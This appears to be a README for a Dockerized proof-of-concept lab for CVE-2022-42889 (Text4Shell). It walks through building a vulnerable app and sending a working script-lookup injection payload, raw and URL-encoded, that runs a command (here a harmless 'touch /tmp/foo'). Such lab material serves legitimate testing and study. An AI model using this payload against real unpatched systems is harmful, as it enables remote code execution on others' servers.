/cve-2022-42889-text4shell-docker

Dockerized POC for CVE-2022-42889 Text4Shell

Primary LanguageJava

Install maven - maven-linux


  1. Docker build
docker build --tag=text4shell .
  1. Docker run
docker run -p 80:8080 text4shell
  1. Test the app
http://localhost/text4shell/attack?search=<anything>
  1. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. You can also try using dns or url prefixes.

  2. Get the container id

docker container ls
  1. Get into the app
docker exec -it <container_id> bash
  1. To check if above RCE was successful (You should see a file named foo created in the /tmp directory):
ls /tmp/
  1. To stop the container
docker container stop <container_id>